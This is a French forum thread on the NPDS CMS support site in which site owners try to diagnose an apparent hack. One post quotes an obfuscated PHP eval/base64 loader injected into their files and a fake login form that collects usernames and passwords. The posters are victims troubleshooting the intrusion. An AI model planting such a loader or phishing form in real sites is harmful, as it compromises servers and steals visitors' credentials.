Gestion de Contenu, de Communauté et de groupes de travail collaboratif - Open Source, français, sécurisé, stable et performant

  • MODULES

    Pour étendre les nombreuses fonctionnalités disponibles de base - modules.npds.org est à votre disposition.

    Des modules complémentaires, une communauté de développeurs active, des forums pour vos questions ... NPDS  est aussi une plateforme de développement !

  • STYLES

    Vous cherchez des thèmes graphiques pour votre portail ou votre communauté : styles.npds.org est à votre disposition.

    Des thèmes du plus simple au plus sophistiqué. Des thèmes facilement modifiables et toujours en Open-Source - Laissez simplement parler votre imagination !

  • BIBLES

    La documentation indispensable pour personnaliser et exploiter toute la puissante de NPDS  est à votre disposition sur bible.npds.org.

    Vous pouvez participer à l'effort de documentation - rien de plus simple : contactez un membre de la Team de développement et nous vous ouvrirons un compte sur le Wiki !
Devenir membre    |    Identifiant : Mot de Passe : -
Au delà de la gestion de contenu 'classique', NPDS met en oeuvre un ensemble de fonctions spécifiquement dédiées à la gestion de Communauté et de groupes de travail collaboratif.
Il s'agit d'un Content & Community Management System (CCMS) robuste, sécurisé, complet, performant et parlant vraiment français.

Gérez votre Communauté d'utilisateurs, vos groupes de travail collaboratif, publiez, gérez et organisez votre contenu grâce aux puissants outils disponibles de base.
  • Multi langues (Français, Anglais, Allemand, Espagnol, Chinois)
  • Respect des standards : UTF8, XHTML, CSS, ...
  • Système de blocs avancés
  • Installation et administration complète et centralisée
  • Editeur HTML intégré
  • Gestionnaire de fichier en ligne
  • Gestion des groupes de membres
  • Ecriture collaborative de documents (PAD)
  • Forums évolués
  • Mini-sites (pour les membres et les groupes de travail)
  • Chat temp réel
  • Système de News et de rubriques complet (édition, révision, publication)
  • ...
Gratuit et libre (Open-Source), développé en PHP, NPDS est personnalisable grâce à de nombreux thèmes et modules et ne requiert que quelques compétences de base.
NPDS Workplace - groupe de travail collaboratif
 NPDS WorkSpace - tous l'univers du travail collaboratif.
Modéré par : developpeur jpb Jireck 
Index du Forum » » Sécurité » » authentificate ?  
4 pages [ 1 | 2 | 3 | 4 ]
Auteurauthentificate ?
mimit54
55    

mimit54
  Posté : 19-02-2009 23:24

OUPs!!
Je pense subir le même désagrément. A savoir, Lorsque je veux 'proposer un article', j'ai une bonne page de texte avec des liens qui s'affiche avant le mon bandeau habituel. En editant le code de la page submit.php, je trouve bien le script, bien sur inconnu.
Autre chose: changement de theme: après avoir choisi le nouveau, je tombe sur le formulaire d'authenfication 'fantôme' évoqué. Voici le code de la page submit.php:


<form action='/user.php' method='POST'><input type='text' name='login'><br/><input name='pass' type='password'><br /><input type='submit' value='authenticate'></form>


J'ai désactive la fonction filemanager, j'espere que ça va s'arreter là!
Les seules modif majeurs sont le passage à évolution le 28/01/09 et l'installation de npdsAnalytics le 17/02/09.
Je suis disponible pour fournir tous renseignements pouvant aider à décuvrir le pb.
  Profil  Citation   
Bege
472      

Bege
  Posté : 19-02-2009 23:41

et bien je pense ue tu as comme moi été victime d'un piratage
  Profil  www  Citation   
mimit54
55    

mimit54
  Posté : 20-02-2009 00:00

Ouaih...
J'ai rechargé les 2 fichiers, mais malheureusement, le pb demeure. as tu avancé dans tes recherches?
  Profil  Citation   
Bege
472      

Bege
  Posté : 20-02-2009 00:13

Citation : mimit54 

Ouaih...
J'ai rechargé les 2 fichiers, mais malheureusement, le pb demeure. as tu avancé dans tes recherches? 


non j'ai abandonné et suis en train de refaire le tout de A à Z
  Profil  www  Citation   
mimit54
55    

mimit54
  Posté : 20-02-2009 00:25

je me demande si je ne vais pas etre oblige de passer par là, car je ne sais plus quoi faire! Mais la question qui subsiste: comment se premunir de ce truc?
Bon courage
  Profil  Citation   
Bege
472      

Bege
  Posté : 20-02-2009 00:26

Citation : mimit54 

je me demande si je ne vais pas etre oblige de passer par là, car je ne sais plus quoi faire! Mais la question qui subsiste: comment se premunir de ce truc?
Bon courage 


tu es hébergé chez qui?
  Profil  www  Citation   
mimit54
55    

mimit54
  Posté : 20-02-2009 08:34

Je suis chez free.
J'ai vu l'échange avec Hotfirenet, as tu des retours d'analyse de tes fichiers?
J'hésite encore à tout réinstaller
Je viens de remarquer que la plupart de mes fichiers (sur le serveur) possede sur la premiere ligne, donc avant le code NPDS ce code:


<?php /**/eval(base_64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFN bJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvbW50LzE0NS9zZG EvOC8wL2FuYWJuYW5jeS9lZGl0ZXVyL3RpbnlfbWNlL3RoZW1lcy9hZHZhbmNlZC9kb2NzL2VuL2ltY Wdlcy9jb3BwZXIucGhwJykpe2luY2x1ZGVfb25jZSgnL21udC8xNDUvc2RhLzgvMC9hbmFibmFuY3kv ZWRpdGV1ci90aW55X21jZS90aGVtZXMvYWR2YW5jZWQvZG9jcy9lbi9pbWFnZXMvY29wcGVyLnBocCc pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKC FmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRkKXskZj1vcmQoc 3Vic3RyKCRkLDMsMSkpOyRoPTEwOyRlPTA7aWYoJGYmNCl7JGU9dW5wYWNrKCd2JyxzdWJzdHIoJGQs MTAsMikpOyRlPSRlWzFdOyRoKz0yKyRlO31pZigkZiY4KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSs xO31pZigkZiYxNil7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMil7JGgrPTI7fSR1PW d6aW5mbGF0ZShzdWJzdHIoJGQsJGgpKTtpZigkdT09PUZBTFNFKXskdT0kZDt9cmV0dXJuICR1O319Z nVuY3Rpb24gZGdvYmgoJGIpe0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRjPWd6ZGVj b2RlKCRiKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkYykpe3JldHVybiBwcmVnX3JlcGxhY2U oJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRjKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJG M7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>




Message édité par : mimit54 / 20-02-2009 09:17

  Profil  Citation   
Hotfirenet
1738       
 

Hotfirenet
  Posté : 20-02-2009 15:38

ouep j'ai vu ca aussi et je me disais que ca venais du cache et en plus base_64_decode n'existe pas dans le code Npds

j'y comprend rien a votre probleme
  Profil  E-mail  www  Citation   
mimit54
55    

mimit54
  Posté : 21-02-2009 01:28

J'ai rapatrié tous les fichiers de la racine du site, aucune trace du formulaire 'authenticate'
Comment apres avoir 'Valider mes modifications' (changer de theme), je me retrouve avec l'appel de user.php avec juste comme contenu le code copié plus haut.
J'ai fait une erreur tout à l'heure c'est le contenu de user.php et non pas submit.php
J'aime pas ne pas comprendre mais où chercher
  Profil  Citation   
Hotfirenet
1738       
 

Hotfirenet
  Posté : 21-02-2009 11:03

ba c ça le problème, je ne sais plus ou chercher ...
ce qui m'a parut bizarre pour bege, c'est que j'ai récupérer son site et installer sur mon serveur et la je n'avez plus d'erreur plus de script !javascript! plus de problème ...

donc est ce que ton site utilise d'autre script que NPDS ?
  Profil  E-mail  www  Citation   
mimit54
55    

mimit54
  Posté : 21-02-2009 14:22

Oui, en effet j'ai encapsulé Coppermine. Tu penses que je dois le virer pour voir?
bege avait d'autres scripts que NPDS?

Je peux préciser que je n'ai rien vu d'anormal dans les fichiers security.log, par contre dans les sessions, j'ai très fréquemment 5,6 voire 9 sessions d'anonymes provenant d'adresse de sites étrangers sans aucun rapport avec le sujet traité sur mon site.
Voici d'ailleurs l'adresse: http://anabnancy.free.fr/


Message édité par : mimit54 / 21-02-2009 14:33

  Profil  Citation   
Bege
472      

Bege
  Posté : 21-02-2009 20:29

Citation : mimit54 
Voici d'ailleurs l'adresse: http://anabnancy.free.fr/


aaaaaaaaaaaargh! nan, fallait pas me montrer ça!!!
j'aime trop les Bonsaï!
mais j'ai aussi trop de passions, ça va plus ça, c'est de la provoc! je me plaindrais


P.S.
rien à voir mais plus moyen de mettre un avatar dans mon profil
  Profil  www  Citation   
mimit54
55    

mimit54
  Posté : 22-02-2009 02:03

Ah oui, c'est une de mes nombreuses occupations, patience, nature, soins, bien être à tailler, regarder pousser mais bref on est pas là pour ça, cet après midi, j'ai commencé un rempotage, ça m'a detendu de l'informatique
Mais j'y suis de nouveau et voici le résultat!!
J'ai copié tout mon site, BdD comprise en local, sous EasyPHP et pas une erreur, pas de formulaire bizarre, mais où se cache le diable
Là, je vais me coucher, car ça me dépasse! J'espère que je ne vais pas faire de cauchemar
  Profil  Citation   
Hotfirenet
1738       
 

Hotfirenet
  Posté : 22-02-2009 08:55

pourtant tu es en sable evol toi contrairement a bege ...
  Profil  E-mail  www  Citation   
mimit54
55    

mimit54
  Posté : 24-02-2009 14:46

Le canard est toujours vivant!!
J'ai transféré tout le contenu du site sur un autre hébergement, pas de pb. Je sais que bege nous a fait part de tout refaire, alors je voulais savoir si l'opération a été concluante avant de m'y lancer.
  Profil  Citation   
Aller à la page : [ 1 | 2 | 3 | 4 ]
  
Sauter à :

Temps : 0.0432 seconde(s)